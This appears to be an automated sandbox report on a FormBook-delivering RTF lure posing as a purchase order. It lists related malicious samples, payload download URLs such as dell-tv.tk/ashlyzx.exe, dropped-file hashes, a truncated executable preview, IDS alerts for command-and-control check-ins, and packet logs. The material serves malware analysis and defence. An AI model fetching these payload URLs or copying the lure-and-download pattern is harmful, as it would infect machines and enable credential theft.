| Drawing-FS3589_Surra-Unprice BOQ - Lock file - 28.1.2021.xlsx 788K.doc | malicious | kizitox.ga/mpomzx.exe
| PURCHASE ORDER.doc | malicious | kizitox.ga/chriszx.exe
| DHL AWB TRACKING DETAILS.doc | malicious | kizitox.ga/okeyzx.exe
| items.doc | malicious | samsung-tv.tk/arinzezx.exe
| my orderPDF.exe | malicious | drossmnfg.com/stallion/index.php
| Order Speficications.doc | malicious | samsung-tv.tk/urchzx.exe
| temp order (2).exe | malicious | drossmnfg.com/stallion/index.php
| 444order.doc | malicious | kizitox.ga/doziezx.exe
| SCANNED DOCUMENT.doc | malicious | samsung-tv.tk/obizx.exe
| HOLLAND - TEKL#U0130F MEKTUBU - 19,11,2021 - T.D.doc | malicious | kizitox.ga/chungzx.exe

                                                            Domains

Match | Associated Sample Name / URL | Detection | Context
dell-tv.tk | Quotation No. Q07387.doc | malicious | 37.0.9.166
| Swift Copy TT.doc | malicious | 37.0.9.166
| nwamafour.exe | malicious | 162.215.241.145
| nwamafour.exe | malicious | 162.215.241.145
| WeChat image_20210422104940_PDF.exe | malicious | 162.215.241.145

                                                            ASN

                                                            Match | Associated Sample Name / URL | Detection | Context
                                                            CLOUDFLARENETUS | Quotation No. Q07387.doc | malicious | 104.21.19.200
                                                            CLOUDFLARENETUS | hSlk750R2b.exe | malicious | 104.23.98.190
                                                            CLOUDFLARENETUS | Order Contract_signed (2NQ39NGAY0GD).ppam | malicious | 104.16.203.237
                                                            CLOUDFLARENETUS | Halbank Ekstre 2021101 073653 270424.exe | malicious | 172.67.188.154
                                                            CLOUDFLARENETUS | Hong Jin International Co Ltd -Order Specification.exe | malicious | 104.21.19.200
                                                            CLOUDFLARENETUS | ORDER PROPOSAL.exe | malicious | 162.159.134.233
                                                            CLOUDFLARENETUS | 8p2NlqFgew.exe | malicious | 162.159.135.233
                                                            CLOUDFLARENETUS | TT COPY_02101011.exe | malicious | 172.67.158.42
                                                            CLOUDFLARENETUS | GZ4OR9sIdP.exe | malicious | 172.67.188.154
                                                            CLOUDFLARENETUS | 4lWWTrEJuS.exe | malicious | 104.21.31.203
                                                            CLOUDFLARENETUS | TT_SWIFT_Export Order_noref S10SMG00318021.exe | malicious | 23.227.38.74
                                                            CLOUDFLARENETUS | TxIDbatch#7809.htm | malicious | 104.16.18.94
                                                            CLOUDFLARENETUS | Se adjunta el pedido, proforma.exe | malicious | 162.159.134.233
                                                            CLOUDFLARENETUS | Google_Play_Store_flow_split.apk | malicious | 104.21.4.48
                                                            CLOUDFLARENETUS | Statement.html | malicious | 104.16.18.94
                                                            CLOUDFLARENETUS | Employee payment plan.HTM | malicious | 104.18.10.207
                                                            CLOUDFLARENETUS | S9yf6BkjhTQUbHE.exe | malicious | 172.67.178.31
                                                            CLOUDFLARENETUS | Halbank Ekstre 2021101 073653 270424.exe | malicious | 172.67.188.154
                                                            CLOUDFLARENETUS | yH8giB6jJ2.exe | malicious | 162.159.135.233
                                                            CLOUDFLARENETUS | pwY5ozOzpY | malicious | 172.64.209.6
                                                            WKD-ASIE | Quotation No. Q07387.doc | malicious | 37.0.9.166
                                                            WKD-ASIE | 0VDGA4mWCE.exe | malicious | 37.0.10.250
                                                            WKD-ASIE | Payment+Advice.doc | malicious | 37.0.11.230
                                                            WKD-ASIE | Swift Copy TT.doc | malicious | 37.0.9.166
                                                            WKD-ASIE | Invitation PQ Documents Submission QTN.(#U007eMB).doc | malicious | 37.0.11.230
                                                            WKD-ASIE | PO201808143_330542IMG_20200710_0008.rtf | malicious | 37.0.11.230
                                                            WKD-ASIE | 874578.doc | malicious | 37.0.11.230
                                                            WKD-ASIE | 2020 year financial report.doc | malicious | 37.0.11.230
                                                            WKD-ASIE | Payment Advice.doc | malicious | 37.0.11.230
                                                            WKD-ASIE | PO 36457967.doc | malicious | 37.0.11.230
                                                            WKD-ASIE | QUOTE20212411.doc | malicious | 37.0.11.230
                                                            WKD-ASIE | Order ID 1426095239.doc | malicious | 37.0.9.166
                                                            WKD-ASIE | PAYMENT2021A0087NOV.doc | malicious | 37.0.9.166
                                                            WKD-ASIE | Temp Order2.exe | malicious | 37.0.9.166
                                                            WKD-ASIE | 162AB00C0E943F9548B04F3437867508656480585369C.exe | malicious | 37.0.11.8
                                                            WKD-ASIE | Rev_NN doccument.doc | malicious | 37.0.9.166
                                                            WKD-ASIE | 20211122.doc | malicious | 37.0.9.166
                                                            WKD-ASIE | PO-20212222.doc | malicious | 37.0.9.166
                                                            WKD-ASIE | BANK DETAILS.doc | malicious | 37.0.9.166
                                                            WKD-ASIE | 50% TT advance copy.doc | malicious | 37.0.9.166

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ashlyzx[1].exe
                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:downloaded
                                                            Size (bytes):560128
                                                            Entropy (8bit):7.648991597743519
                                                            Encrypted:false
                                                            SSDEEP:12288:XBzcmhiTopuBWTgKY6VnDe9k2X9/KPMsh8S7P/TyjixBFmRq:XBomhisIWAIDe9HtK1h8Srbyji1Wq
                                                            MD5:D236BB1F86CAEC110ABB20FC2360E25B
                                                            SHA1:0611498ED409D30150D2A0B2A6426E5CB9504D8A
                                                            SHA-256:2F08F5B23A062671FBA5957B98D05A728299BB1AE98695B9B5D36E75528CCAB7
                                                            SHA-512:4F1B645A4710291C197F25E7C7258D5D4D2F710607412228DEBA8D7A1C172FDD6D82DB2C791C6D6064E405AA577DDC1BF469D6EB8C2241A0ACB068A31F3490D1
                                                            Malicious:true
                                                            Reputation:low
                                                            IE Cache URL:http://dell-tv.tk/ashlyzx.exe
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a..............0.................. ........@.. ....................................@....................................O.......p............................................................................ ............... ..H............text...t.... ...................... ..`.rsrc...p...........................@..@.reloc..............................@..B........................H........H...!..........dj..`4............................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                            Category:dropped
                                                            Size (bytes):5632
                                                            Entropy (8bit):4.139240799996483
                                                            Encrypted:false
                                                            SSDEEP:48:roMMP9awF8kcQNxFYCiMjbi3sAT3ZMidDs9n5bSUEppRu+:/MPD8kcYHJjezIENdl
                                                            MD5:B020D2CE44C467E09C418C1F777299A6
                                                            SHA1:D0394BC7ED85C851703043A84F028B3CA6C47B5B
                                                            SHA-256:2A81E3D4E24096064B48F6E027444A37E9FADD9375DD5ADCDD69AED75F847769
                                                            SHA-512:5E89FD1536298E0D1AEA1C9C2A5C6744CFC52F4830C0CBCA7A828912067972502AAA069EC94B1C0746FB5A9696C13F84A1865DD9A721D02C9857E934C2B3C6E5
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Reputation:low
                                                            Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1301DF5A-9B1F-4290-90EE-2E8BF9838615}.tmp
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1024
                                                            Entropy (8bit):0.05390218305374581
                                                            Encrypted:false
                                                            SSDEEP:3:ol3lYdn:4Wn
                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{780FD6C6-AC2E-47FB-9E8C-CE3647E85B1F}.tmp
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):16896
                                                            Entropy (8bit):3.570527510134586
                                                            Encrypted:false
                                                            SSDEEP:384:8BuQrm+Mk+CkPYTJxgdHjGdIfZ3fbTreF8FNWZ:8EQKvk+BPYl9Kvz/WZ
                                                            MD5:D7466498EA7397EC632CB793A4B67FB8
                                                            SHA1:EA7FABB10EE13095DD52A380F1C9D3130714D58A
                                                            SHA-256:F09706A2416ABDA332F431EE91348A088DBF4F8D6F0702CCAFF28B8EB5A6CF32
                                                            SHA-512:F0638D0187B7B7F48262298C84A18B63E381C096CE78A65ED7E72EBD166C1E62D386E1B0B562021C4F218BE36C1C7F79A148E51ADE663A3E365E2738C7B3D40D
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: '.=.?...&.=.+...?.2.4.>.[./.^.!.2.-.|.?.?.?.|.$.?.%.^.%.*.`.+.9.,.#.?.?.%.8.6...?.#.<.'.;.+.6.|.'.0.+.%.@.|._._.'.6.,.|...<.7.`._.(.<.0.0.=.9.;.&...2.&.=.=.?.(.?.1.>.#...4.-.~._.2.?.~.(.4./.|.0...,.].|...(.?.?...1.?.@.<.~.'.?.'._.|.?.4.].[.&.@.$.?.#.?.?.&.^.@.).;.|.(.].3.~.`._.<.?.,.`.5.~.(.`.7.-.?.>.;.(.).<.^.+.^.!.,.4.6.~.7.7.]./._.?.#.0.2.,.:.?.].|.8.|.].4...^.].&.|.?.%._.9.%.?.4.).3...~.4.?...?.^.&.[.$.?.;.?.=.&.%.5...@...;.~.>.;.?.%...4.%.?.&.;.).:.(.;.+.$.3.[.?.0.?...3.[.?.1.1.../.2...]...7.2.3...>.;.0.5...=.:.1.*.].=.?.2.*.?.?.?.*.[...|.?.&.;.;.?.).7.?.'.%.[.'.%.8.?.6.%...?.7.#.'.9.3.).$.;.?.;.4.3.].&.!.$.#.4.?...?.^.%.?.3.*.'.[.?.5.(./.%.?.^.&.'.'.$.~.@.9.1.^.9.).6.|.^.>.>.;.&.6.>.#.*.4.!.&.:.`././.1.[.6.1.0.~.:...`.?.1.]./.~.-.+.?.%.?.?.?.0.~.?.~.0.,.4.~...?.?.=.%.?.%.`.|.&.|.$.+.:.?.4.%.?.8._.1.;.8.1.9.?.~...?.).?..._.7.-.~.^.=.$._.?.?.~...].......1.).=.!.0.4...:.4.*.2.1.'.2.7.)...~.?.8.$.....:.3.)./.1.~._.?.!.4.:.9.:.!..._.#.>.@.<...!.!...;.=.&.:.~.^.:.%.0.?.8.;...~.!.+.=.1.
                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\P.O-5433ERE.LNK
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:57 2021, mtime=Mon Aug 30 20:08:57 2021, atime=Fri Nov 26 01:08:15 2021, length=21635, window=hide
                                                            Category:dropped
                                                            Size (bytes):1019
                                                            Entropy (8bit):4.530153378570899
                                                            Encrypted:false
                                                            SSDEEP:24:8CNeq7k/XTuzLIvcNe9sgmDv3q6iQd7Qy:8CNeq7k/XTkIcNgzttUj
                                                            MD5:9892E2ECCDB56857139B89D1CC41DE9B
                                                            SHA1:B0965C6B38F9190AB9FDA1770B43F5F5E5D746FE
                                                            SHA-256:896A255ACA90326B2CAAA3F51EB0AB779DA76525EF9FD3232CCD910DAA9787D8
                                                            SHA-512:8778AFD4B7FF99A07DEF6495861076998BB6BC566465E36AF84414B164B6577B36825B629F0B3C78D60661FDE9A5B094DEC90B14EA0DF4F9EDE8EE17B0C2D3BE
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: L..................F.... ......?......?...;..yj....T...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2..T..zS.. .PO-543~1.DOC..L.......S...S..*.........................P...O.-.5.4.3.3.E.R.E...d.o.c.......y...............-...8...[............?J......C:\Users\..#...................\\376483\Users.user\Desktop\P.O-5433ERE.doc.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P...O.-.5.4.3.3.E.R.E...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......376483..........D_....3N...W...9..g............[D_....3N...W...9.
                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):73
                                                            Entropy (8bit):4.773958169341782
                                                            Encrypted:false
                                                            SSDEEP:3:bDuMJltejggLFXVomX1BzEggLFXVov:bCmeEOBVh/OBVy
                                                            MD5:131E7683725D996AEC21A1F5847BCDE0
                                                            SHA1:D2072FE38996DC116BB8F83FAA6EB06DA12A12BC
                                                            SHA-256:5C4CEDA284DE11D195F3FFBE973AFE37C644D83E539A0FD45D669DE21AC889E3
                                                            SHA-512:B54A862B3A415138850784C131BCB85F43BFDA6F2E39C737C18A6347450BB94F79F1C813486E42AA4316DD291A7A88C533355C1DB48117FF3B431BFE46023BF5
                                                            Malicious:false
                                                            Preview: [folders]..Templates.LNK=0..P.O-5433ERE.LNK=0..[doc]..P.O-5433ERE.LNK=0..
                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):2.5038355507075254
                                                            Encrypted:false
                                                            SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                            MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                            SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                            SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                            SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                            Malicious:false
                                                            Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                            C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):560128
                                                            Entropy (8bit):7.648991597743519
                                                            Encrypted:false
                                                            SSDEEP:12288:XBzcmhiTopuBWTgKY6VnDe9k2X9/KPMsh8S7P/TyjixBFmRq:XBomhisIWAIDe9HtK1h8Srbyji1Wq
                                                            MD5:D236BB1F86CAEC110ABB20FC2360E25B
                                                            SHA1:0611498ED409D30150D2A0B2A6426E5CB9504D8A
                                                            SHA-256:2F08F5B23A062671FBA5957B98D05A728299BB1AE98695B9B5D36E75528CCAB7
                                                            SHA-512:4F1B645A4710291C197F25E7C7258D5D4D2F710607412228DEBA8D7A1C172FDD6D82DB2C791C6D6064E405AA577DDC1BF469D6EB8C2241A0ACB068A31F3490D1
                                                            Malicious:true
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a..............0.................. ........@.. ....................................@....................................O.......p............................................................................ ............... ..H............text...t.... ...................... ..`.rsrc...p...........................@..@.reloc..............................@..B........................H........H...!..........dj..`4............................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
                                                            C:\Users\user\Desktop\~$O-5433ERE.doc
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):2.5038355507075254
                                                            Encrypted:false
                                                            SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                            MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                            SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                            SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                            SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                            Malicious:false
                                                            Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                            Static File Info

                                                            General

                                                            File type:Rich Text Format data, unknown version
                                                            Entropy (8bit):4.45528097771043
                                                            TrID:
                                                            • Rich Text Format (5005/1) 55.56%
                                                            • Rich Text Format (4004/1) 44.44%
                                                            File name:P.O-5433ERE.doc
                                                            File size:21635
                                                            MD5:17ca06000e92058f0d43259b2683537c
                                                            SHA1:db453e5125310d209fe04fb0211677d79d25f3ee
                                                            SHA256:3c9280552a4129fdf884414b080c80d5ffc72403079d7a5292e9b09d832ab37d
                                                            SHA512:3e05cc9f7284eb7a1d6756380882b0b1b2d89ce42b887e6c28c49342a9ce61157392997f7bdd96add1fbeefe3ea2ce07c14e8b1e6b245488a2c248d0b8e51148
                                                            SSDEEP:384:ziXxa+OcfzOxCtiij+jSAF5yQZ5v8dqhS/MF0rDXjq/:mxdy4tiij+jSy/iqhf
                                                            File Content Preview:{\rtf713'=?.&=+.?24>[/^!2-|???|$?%^%*`+9,#??%86.?#<';+6|'0+%@|__'6,|.<7`_(<00=9;&.2&==?(?1>#.4-~_2?~(4/|0.,]|.(??.1?@<~'?'_|?4][&@$?#??&^@);|(]3~`_<?,`5~(`7-?>;()<^+^!,46~77]/_?#02,:?]|8|]4.^]&|?%_9%?4)3.~4?.?^&[$?;?=&%5.@.;~>;?%.4%?&;):(;+$3[?0?.3[?11./2

                                                            File Icon

                                                            Icon Hash:e4eea2aaa4b4b4a4

                                                            Static RTF Info

                                                            Objects

                                                            Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
                                                            0 | 00001F62h | | | | | | | | no
                                                            1 | 00001F16h | 2 | embedded | EqUatIon.3 | 1614 | | | | no

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                            11/25/21-18:10:21.768246 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49166 | 80 | 192.168.2.22 | 144.91.75.9
                                                            11/25/21-18:10:21.768246 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49166 | 80 | 192.168.2.22 | 144.91.75.9
                                                            11/25/21-18:10:21.768246 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49166 | 80 | 192.168.2.22 | 144.91.75.9
                                                            11/25/21-18:10:31.987537 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49167 | 80 | 192.168.2.22 | 34.102.136.180
                                                            11/25/21-18:10:31.987537 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49167 | 80 | 192.168.2.22 | 34.102.136.180
                                                            11/25/21-18:10:31.987537 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49167 | 80 | 192.168.2.22 | 34.102.136.180
                                                            11/25/21-18:10:32.106174 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 34.102.136.180 | 192.168.2.22
                                                            11/25/21-18:10:37.240250 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49168 | 80 | 192.168.2.22 | 34.102.136.180
                                                            11/25/21-18:10:37.240250 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49168 | 80 | 192.168.2.22 | 34.102.136.180
                                                            11/25/21-18:10:37.240250 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49168 | 80 | 192.168.2.22 | 34.102.136.180
                                                            11/25/21-18:10:37.357869 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49168 | 34.102.136.180 | 192.168.2.22

                                                            TCP Packets

Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Nov 25, 2021 18:08:39.144543886 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.172197104 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.172300100 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.172686100 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.200264931 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.202337980 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.202358961 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.202399969 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.202477932 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.202503920 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.202521086 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.202532053 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.202568054 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.202580929 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.202594042 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.202670097 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.202718973 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.202744961 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.202792883 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.230190992 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.230221033 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.230232954 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.230246067 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.230258942 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.230289936 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.230309963 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.230319977 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.230360031 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.230364084 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.230365992 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.230367899 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.230370045 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.230371952 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.231187105 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.258021116 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.258049011 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.258079052 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.258127928 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.258153915 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.258163929 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.258173943 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.258191109 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.258203030 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.258208990 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.258234978 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.258260012 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.258315086 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.258332968 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.258369923 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.260016918 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.285830975 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.285857916 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.285871983 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.285886049 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.285936117 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.285938978 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.285959005 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.285968065 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.285974979 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.285979033 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.285998106 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.286014080 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.286031961 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.286067963 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.313581944 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.313611984 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.313626051 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.313638926 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.313668966 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.313749075 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.313786983 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.313790083 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.313792944 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.313795090 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.341367960 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.341401100 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.341444969 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.341645002 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.369299889 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.369411945 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.396967888 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.397115946 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.424694061 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.424722910 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.424876928 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.425214052 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.452599049 CET  80           49165      37.0.9.166    192.168.2.22
